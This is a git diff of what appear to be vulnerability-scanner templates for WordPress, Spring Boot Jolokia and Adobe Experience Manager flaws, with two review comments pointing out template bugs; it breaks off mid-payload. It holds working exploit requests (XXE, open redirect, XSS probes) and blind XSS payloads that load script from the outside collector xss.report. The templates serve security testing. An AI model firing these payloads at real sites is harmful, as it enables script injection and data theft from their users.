@@ -1,13 +1,17 @@ id: wp-xmlrpc-pingback-detection + info: name: Wordpress XMLRPC Pingback detection author: pdteam severity: info - tags: wordpress,ssrf,oast reference: - https://github.com/dorkerdevil/rpckiller - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 -requests: + metadata: + max-request: 1 + tags: wordpress,ssrf,oast,xmlrpc + +http: - raw: - | POST /xmlrpc.php HTTP/1.1 @@ -28,8 +32,11 @@ requests: + matchers: - type: word part: interactsh_protocol words: - "http" + +# digest: 4b0a004830460221008b8847819052a4cc6cd580593aa61fc11d40f73fa22d07b122b1a20410cfc54c022100ff2ea66548804bac51edcc23bfe7259dd34f27a13a7eef2890239b93dcdeb8cf:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wpdm-cache-session-11436.yaml b/poc/wordpress/wpdm-cache-session-11436.yaml new file mode 100644 index 0000000000..ba8153e31e --- /dev/null +++ b/poc/wordpress/wpdm-cache-session-11436.yaml @@ -0,0 +1,23 @@ +id: wpdm-cache-session +info: + name: Wpdm-Cache Session + author: dhiyaneshDk + severity: medium + reference: https://www.exploit-db.com/ghdb/7004 + tags: wordpress +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' + matchers-condition: and + matchers: + - type: word + words: + - "Index of /" + - ".txt" + - "wpdm-cache" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/wordpress/wpdm-cache-session-11438.yaml b/poc/wordpress/wpdm-cache-session-11438.yaml deleted file mode 100644 index 9e12c4ad90..0000000000 --- a/poc/wordpress/wpdm-cache-session-11438.yaml +++ /dev/null 
@@ -1,24 +0,0 @@ -id: wpdm-cache-session -info: - name: Wpdm-Cache Session - author: dhiyaneshDk - severity: medium - reference: - - https://www.exploit-db.com/ghdb/7004 - tags: wordpress -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' - matchers-condition: and - matchers: - - type: word - words: - - "Index of /" - - ".txt" - - "wpdm-cache" - condition: and - part: body - - type: status - status: - - 200 diff --git a/poc/wordpress/wpengine-config-check.yaml b/poc/wordpress/wpengine-config-check.yaml deleted file mode 100644 index c6db13b52d..0000000000 --- a/poc/wordpress/wpengine-config-check.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wpengine-config-check - -info: - name: WP Engine Config Check - author: SirBugs - severity: high - -requests: - - method: GET - path: - - "{{BaseURL}}/wpeprivate/config.json" - - matchers-condition: and - matchers: - - type: word - condition: or - words: - - "WPENGINE_SESSION_DB_USERNAME" - - "WPENGINE_SESSION_DB_PASSWORD" - - "WPENGINE_SESSION" - - "wpengine_apikey" - - "WP_CACHE_KEY_SALT" diff --git a/poc/wordpress/wptouch-open-redirect-11592.yaml b/poc/wordpress/wptouch-open-redirect-11592.yaml new file mode 100644 index 0000000000..c5f6660a05 --- /dev/null +++ b/poc/wordpress/wptouch-open-redirect-11592.yaml 
@@ -0,0 +1,24 @@ +id: wptouch-open-redirect +info: + name: WPTouch Switch Desktop 3.x Open Redirection + author: 0x_Akoko + severity: medium + description: | + WordPress WPTouch Switch Desktop 3.x accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. + + An HTTPparameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance. + + Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data. + + The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. + reference: https://cxsecurity.com/issue/WLB-2020030114 + tags: wp-plugin,redirect,wordpress +requests: + - method: GET + path: + - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/poc/wordpress/wptouch-open-redirect-11595.yaml b/poc/wordpress/wptouch-open-redirect-11595.yaml index 576e334c9e..1bd339ff3c 100644 
--- a/poc/wordpress/wptouch-open-redirect-11595.yaml
+++ b/poc/wordpress/wptouch-open-redirect-11595.yaml
@@ -1,25 +1,30 @@ id: wptouch-open-redirect + info: - name: WPTouch Switch Desktop 3.x Open Redirection + name: WordPress WPtouch 3.x - Open Redirect author: 0x_Akoko severity: medium description: | - WordPress WPTouch Switch Desktop 3.x accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. - - An HTTPparameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance. - - Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data. - - The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. + WordPress WPtouch plugin 3.x contains an open redirect vulnerability. The plugin fails to properly sanitize user-supplied input. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. 
reference: - https://cxsecurity.com/issue/WLB-2020030114 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-601 + metadata: + max-request: 1 tags: wp-plugin,redirect,wordpress -requests: + +http: - method: GET path: - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://interact.sh/" + matchers: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header + +# digest: 4b0a00483046022100f3c87781d27f6cc65f7c1362b9ac9f410327c860c77e82f18d6c995bc2f5fd66022100eec2e1ba6ac9511d829dff5a51691592bebe32cfb1da8e33cbed26ea2c54fd15:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wptouch-plugin-open-redirect.yaml b/poc/wordpress/wptouch-plugin-open-redirect.yaml index 4e7dd0fa9d..e26d6d42a2 100644 --- a/poc/wordpress/wptouch-plugin-open-redirect.yaml +++ b/poc/wordpress/wptouch-plugin-open-redirect.yaml @@ -1,14 +1,17 @@ id: wptouch-plugin-open-redirect + info: - name: WPTouch Switch Desktop 3.x Open Redirection + name: Pie Register < 3.7.2.4 - Open Redirect author: 0x_Akoko - reference: https://cxsecurity.com/issue/WLB-2020030114 - severity: medium - tags: wp,redirect,wordpress + reference: https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 + severity: low + tags: wp,redirect,wp-plugin + requests: - method: GET path: - - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" + - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" + matchers: - type: regex regex: diff --git a/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml b/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml new file mode 100644 index 0000000000..8da6679e3e --- /dev/null +++ b/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml 
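Review bot: The wptouch-plugin-open-redirect.yaml hunk changes `name`, `reference` and the request path to the Pie Register `piereg_logout_url` redirect but leaves `id: wptouch-plugin-open-redirect` and the file name untouched, so any hit will be reported under the WPtouch label. It also lowers `severity` to `low` and drops the `wordpress` tag without explanation. I would move this content to a template whose id and file name refer to Pie Register, and leave the WPtouch template as it was. The matcher's `regex:` list lies below the hunk, so I cannot tell from here whether it still checks for `example.com` in the `Location` header.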
@@ -0,0 +1,28 @@ +id: springboot-actuators-jolokia-xxe +info: + name: Spring Boot Actuators (Jolokia) XXE + author: dwisiswant0,ipanda + severity: high + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + reference: + - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators + - https://github.com/mpgn/Spring-Boot-Actuator-Exploit + tags: springboot,jolokia,xxe +requests: + - method: GET + path: + - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" + - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "http:\\/\\/nonexistent:31337\\/logback.xml" + - "reloadByURL" + - "JoranException" + condition: and + - type: status + status: + - 200 diff --git a/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml b/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml deleted file mode 100644 index 8d86dd794f..0000000000 --- a/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml +++ /dev/null 
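Review bot: The second path in springboot-actuators-jolokia-xxe-10430.yaml can never match: it sends `http:!/!/random:915!/logback.xml`, while the body matcher requires the literal `http:\\/\\/nonexistent:31337\\/logback.xml` under `condition: and`. A host that exposes Jolokia only under `/actuator/jolokia` is therefore reported as clean. Use the same marker in both paths, i.e. end the `/actuator/jolokia/...` path with `reloadByURL/http:!/!/nonexistent:31337!/logback.xml`. The marker host should stay a name that does not resolve, so that the check does not make the target fetch a real resource.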
@@ -1,31 +0,0 @@ -id: springboot-actuators-jolokia-xxe - -info: - name: Spring Boot Actuators (Jolokia) XXE - author: dwisiswant0,ipanda - severity: high - description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. - reference: - - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - - https://github.com/mpgn/Spring-Boot-Actuator-Exploit - tags: springboot,jolokia,xxe - -requests: - - method: GET - path: - - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" - - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "http:\\/\\/nonexistent:31337\\/logback.xml" - - "reloadByURL" - - "JoranException" - condition: and \ No newline at end of file diff --git a/poc/xss/aem-setpreferences-xss.yaml b/poc/xss/aem-setpreferences-xss.yaml deleted file mode 100644 index 50e7da80ff..0000000000 --- a/poc/xss/aem-setpreferences-xss.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: aem-setpreferences-xss - -info: - name: AEM setPreferences XSS - author: zinminphy0,dhiyaneshDK - reference: - - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s - - https://github.com/projectdiscovery/nuclei-templates/issues/3225 - - https://twitter.com/zin_min_phyo/status/1465394815042916352 - severity: medium - tags: aem,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" - - "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "" - - 'A JSONObject text must begin with' - condition: and - - - type: status - status: - - 400 \ No newline at end of file diff --git a/poc/xss/aem-xss-childlist-selector-197.yaml b/poc/xss/aem-xss-childlist-selector-198.yaml similarity index 100% rename from poc/xss/aem-xss-childlist-selector-197.yaml rename to poc/xss/aem-xss-childlist-selector-198.yaml diff --git a/poc/xss/aem-xss-childlist-selector.yaml b/poc/xss/aem-xss-childlist-selector.yaml deleted file mode 100644 index c8551970bf..0000000000 --- a/poc/xss/aem-xss-childlist-selector.yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -id: aem-xss-childlist-selector - -info: - name: XSS in childlist selector - author: dhiyaneshDk - severity: medium - description: | - Requests using the selector childlist can an XSS when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence the reflected suffix is executed and interpreted in the browser. - reference: - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java - metadata: - shodan-query: - - http.title:"AEM Sign In" - - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//.html' - - matchers-condition: and - matchers: - - type: word - words: - - '' - - '{"path":"/etc/designs/xh1x.childrenlist.json' - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/poc/xss/basic-xss-prober-698.yaml b/poc/xss/basic-xss-prober-698.yaml deleted file mode 100644 index 34896e90c5..0000000000 --- a/poc/xss/basic-xss-prober-698.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: basic-xss-prober - -info: - name: Basic XSS Prober - Cross-Site Scripting - author: nadino,geeknik - severity: low - description: A cross-site scripting vulnerability was discovered via generic testing. Manual testing is needed to verify exploitation. - # Basic XSS prober - # Manual testing needed for exploitation - metadata: - max-request: 1 - tags: xss,generic - -http: - - method: GET - path: - - "{{BaseURL}}/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e" - - matchers-condition: and - matchers: - - type: word - words: - - "\">" - part: body - - - type: word - words: - - "text/html" - part: header - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100da0d7ddbb8a6ad2fb451fc4ca6d957d06b7fda404ff1e41c443865abfffc40ee022054e97de3bbe455dd05e4b756b8b4749842b38f973645eece0b047775512cafe4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/xss/blind-xss-user-agent.yaml b/poc/xss/blind-xss-user-agent.yaml index 6319dc47cb..3f6bcba7bb 100644 --- a/poc/xss/blind-xss-user-agent.yaml +++ b/poc/xss/blind-xss-user-agent.yaml 
@@ -1,61 +1,30 @@ id: blind-xss info: - name: Blind Cross Site Scripting - author: 0xKayala (Satya Prakash) - severity: high - description: This template will spray blind XSS payloads into URLs. Use 'xss.report', 'bxsshunter.com', 'xsshunter.trufflesecurity.com', 'ez.pe' or 'self-hosted server' to check if the payload fired. - tags: xss, blind-xss, dast, bxss, generic + name: Blind XSS + author: shelled + severity: medium + description: This template will spray blind XSS payloads into URLs. Use xss.report to check if the payload fired. + tags: xss,blind,generic -variables: - first: "{{rand_int(10000, 99999)}}" - script_payload_1: "" - script_payload_2: "\"><41707" - script_payload_3: "" - script_payload_4: "" - script_payload_5: "" - script_payload_6: "" - script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e" - script_payload_8: "%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fjs%2Erip%2F1wqkhxuglq%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E" - -http: - - method: GET - path: - - "{{BaseURL}}" +requests: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: {{injection}} + payloads: - blind: - - "{{script_payload_1}}" - - "{{script_payload_2}}" - - "{{script_payload_3}}" - - "{{script_payload_4}}" - - "{{script_payload_5}}" - - "{{script_payload_6}}" - - "{{script_payload_7}}" - - "{{script_payload_8}}" - - fuzzing: - - part: query - type: postfix - mode: single - fuzz: - - "{{blind}}" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{script_payload_1}}" - - "{{script_payload_2}}" - - "{{script_payload_3}}" - - "{{script_payload_4}}" - - "{{script_payload_5}}" - - "{{script_payload_6}}" 
- - "{{script_payload_7}}" - - "{{script_payload_8}}" - - type: word - part: header - words: - - "text/html" + injection: + - '">' + - '">' + - 'javascript:eval("var a=document.createElement(\"script\");a.src=\"//xss.report/s/shelled\";document.body.appendChild(a)")' + - '">' + - '">